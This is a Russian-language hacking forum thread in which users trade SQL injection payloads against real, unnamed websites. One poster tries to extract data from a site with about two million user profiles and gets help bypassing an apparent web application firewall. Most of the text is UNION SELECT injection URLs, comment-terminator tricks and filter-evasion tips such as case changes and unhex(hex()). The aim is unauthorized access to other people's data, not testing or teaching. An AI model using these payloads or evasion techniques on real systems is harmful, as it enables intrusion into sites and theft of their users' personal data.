MSSQL
script.php?id=14'%20and%201=1--

Выдает Error : Conversion failed when converting the varchar value '14\' to data type int. (severity 16). Как бороться ?

OMG
дай линк в ПМ..

стандартная скуль в mysql

http://www.xxx.com/index.php?id=2956775+union+select+1,2,3,4,5,6,7,8, 9,10/*

выдает нормальную страницу юзера

а вот попытки вывести принтабельные поля не проходят.

все фишки типа:
http://www.xxx.com/index.php?id=-2956775+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.xxx.com/index.php?id=29567111175+union+select+1,2,3,4,5,6, 7,8,9,10/*
http://www.xxx.com/index.php?id=2956775+and+1=2+union+select+1,2,3,4, 5,6,7,8,9,10/*

не дают результат, выводит только:
The profile is not active!

есть ли еще идеи как это обойти?

админки нет, а blind'oм тянуть 2 ляма юзеров это самоубийство

durito
А http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10/* выдает профиль?

Может union и(или) select фильтруются? Поиграй регистром и скобками.

budden

http://www.xxx.com/index.php?id=2956775+and+1=1+union+select+1,2,3,4, 5,6,7,8,9,10/*

выдает профиль юзера
такой же как и тут

http://www.xxx.com/index.php?id=2956775


сайт серьезный, поэтому урл не публикую

unhex(hex())

and+1=0+ попробуй
-2956775 тоже

Что значит выдает профиль юзера?
Если значение intval, то и так будет выдавать id=2956775+antichat+ru--+, и не факт что это инжа. И что значит "and 1=1"? Параметр id и так верный, какой смысл в данной манипуляции?

И последнее.. Только я не вижу вопроса?

v1d0qz
Я тоже так подумал, потому и спросил:
http://www.xxx.com/index.php?id=2956775+and+1=1... у него дает профиль, а
http://www.xxx.com/index.php?id=2956775+and+1=2... - не дает.

Мне кажется там WAF стоит.